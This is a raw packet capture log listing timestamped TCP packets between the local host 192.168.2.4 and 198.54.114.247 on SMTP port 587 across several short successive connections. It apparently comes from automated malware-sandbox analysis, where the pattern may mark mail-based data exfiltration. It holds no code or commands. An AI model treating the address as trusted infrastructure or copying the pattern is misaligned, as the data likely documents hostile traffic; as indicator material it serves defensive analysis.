Oct 1, 2024 06:18:57.858007908 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:57.858031034 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:57.858051062 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:57.862663984 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.862734079 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.862776995 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.862914085 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:58.097366095 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:58.101651907 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:58.106400967 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:58.261913061 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:58.266812086 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:58.266812086 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:58.271583080 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:58.271709919 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:58.842197895 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:58.864814997 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:58.869601965 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.040874004 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.047287941 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:59.052095890 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.215416908 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.215809107 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:59.220551014 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.398741007 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.398761034 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.398770094 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.398778915 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.398788929 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.398821115 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:59.441884041 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:59.489239931 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.491589069 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:59.496332884 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.665173054 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.666152954 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:59.670913935 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.832112074 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.832324028 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:59.837099075 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.997927904 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:59.998173952 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:00.003417015 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.176584005 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.181823015 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:00.187503099 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.347630024 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.347878933 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:00.352716923 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.525154114 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.525410891 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:00.530173063 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.689968109 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.690289021 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:00.690339088 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:00.690339088 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:00.690429926 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:00.695085049 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.695091963 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.695204973 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.927565098 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:00.929177999 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:00.934021950 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:01.095005035 CEST	587	50464	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:01.095459938 CEST	50464	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:01.096595049 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:01.101450920 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:01.101517916 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:01.682943106 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:01.686400890 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:01.691222906 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:01.861952066 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:01.862096071 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:01.866969109 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.028563023 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.029026985 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:02.036115885 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.228264093 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.228276014 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.228283882 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.228298903 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.228358984 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:02.228420019 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:02.320708036 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.322252035 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:02.327107906 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.488174915 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.491280079 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:02.496113062 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.663187981 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.663431883 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:02.668265104 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.830899000 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:02.831254959 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:02.836014986 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.010620117 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.010869026 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:03.015708923 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.175826073 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.176090002 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:03.180962086 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.368293047 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.368511915 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:03.373358011 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.532563925 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.532980919 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:03.533067942 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:03.533092022 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:03.533185959 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:03.537792921 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.537831068 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.537929058 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.537946939 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.783811092 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.784271002 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:03.790712118 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.962430000 CEST	587	50465	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.962984085 CEST	50465	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:03.964063883 CEST	50466	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:03.968889952 CEST	587	50466	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:03.968951941 CEST	50466	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:04.519846916 CEST	587	50466	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:04.520268917 CEST	50466	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:04.525032043 CEST	587	50466	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:04.683254004 CEST	587	50466	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:04.683996916 CEST	50466	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:04.688762903 CEST	587	50466	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:04.707951069 CEST	50466	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:04.709124088 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:04.712975979 CEST	587	50466	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:04.713857889 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:04.715754032 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:04.715763092 CEST	50466	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:05.271802902 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:05.271922112 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:05.276842117 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:05.435592890 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:05.435738087 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:05.440694094 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:05.623204947 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:05.623606920 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:05.628396034 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:05.866241932 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:05.866257906 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:05.866270065 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:05.866281033 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:05.866328001 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:05.953047991 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:05.954376936 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:05.959161043 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.113457918 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.123332024 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:06.128253937 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.281730890 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.289772987 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:06.294542074 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.452461004 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.454164028 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:06.458933115 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.625672102 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.627979994 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:06.632751942 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.788580894 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.788892984 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:06.793771029 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.970376968 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:06.971899986 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:06.976681948 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:07.130757093 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:07.131036043 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:07.131136894 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:07.131150961 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:07.131177902 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:07.136091948 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:07.136107922 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:07.136113882 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:07.136115074 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:07.364447117 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:07.364969969 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:07.369757891 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:07.525609016 CEST	587	50467	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:07.526109934 CEST	50467	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:07.527230978 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:07.532075882 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:07.532141924 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:08.086899996 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.087049007 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:08.091856003 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.247433901 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.247744083 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:08.252590895 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.409147978 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.409477949 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:08.414280891 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.601511955 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.601520061 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.601531982 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.601538897 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.601542950 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.601680994 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:08.688441992 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.689965963 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:08.694813013 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.854661942 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:08.865417004 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:08.870225906 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.025257111 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.033976078 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:09.038853884 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.193057060 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.193381071 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:09.198199034 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.365151882 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.365307093 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:09.370105028 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.535870075 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.536169052 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:09.541034937 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.707633972 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.707890034 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:09.712624073 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.866177082 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.866427898 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:09.866483927 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:09.866483927 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:09.866483927 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:09.871273041 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.871280909 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.871334076 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:09.871342897 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:10.110441923 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:10.114166021 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:10.118959904 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:10.273735046 CEST	587	50468	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:10.274235010 CEST	50468	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:10.277683973 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:10.282510042 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:10.282588959 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:10.830327034 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:10.831976891 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:10.836798906 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:10.991481066 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:10.991705894 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:10.996534109 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.156604052 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.157093048 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:11.161883116 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.337408066 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.337421894 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.337438107 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.337450027 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.337481976 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:11.337513924 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:11.424148083 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.426059008 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:11.430854082 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.586340904 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.587415934 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:11.592223883 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.780638933 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.780909061 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:11.785729885 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.954504967 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:11.954790115 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:11.959582090 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.134336948 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.139939070 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:12.144746065 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.299977064 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.304716110 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:12.309465885 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.485608101 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.485795021 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:12.490600109 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.646733046 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.648940086 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:12.649009943 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:12.649009943 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:12.649009943 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:12.653855085 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.653858900 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.653862953 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.653995991 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.906377077 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:12.911705971 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:12.916661024 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:13.073172092 CEST	587	50469	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:13.077147961 CEST	50469	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:13.077147961 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:13.082220078 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:13.087980032 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:13.638681889 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:13.642355919 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:13.647320986 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:13.802536011 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:13.810476065 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:13.815355062 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:13.973335981 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:13.973690033 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:13.978987932 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.154824018 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.154838085 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.154855967 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.154872894 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.156559944 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:14.241491079 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.245698929 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:14.250520945 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.406522989 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.407406092 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:14.412257910 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.568030119 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.568696022 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:14.573559046 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.729142904 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.729412079 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:14.734174013 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.899990082 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:14.900235891 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:14.905044079 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:15.063250065 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:15.063625097 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:15.068669081 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:15.237767935 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:15.237905979 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:15.242701054 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:15.397273064 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:15.397598982 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:15.397666931 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:15.397690058 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:15.397726059 CEST	50470	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:15.402501106 CEST	587	50470	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:15.402513981 CEST	587	50470	198.54.114.247	192.168.2.4
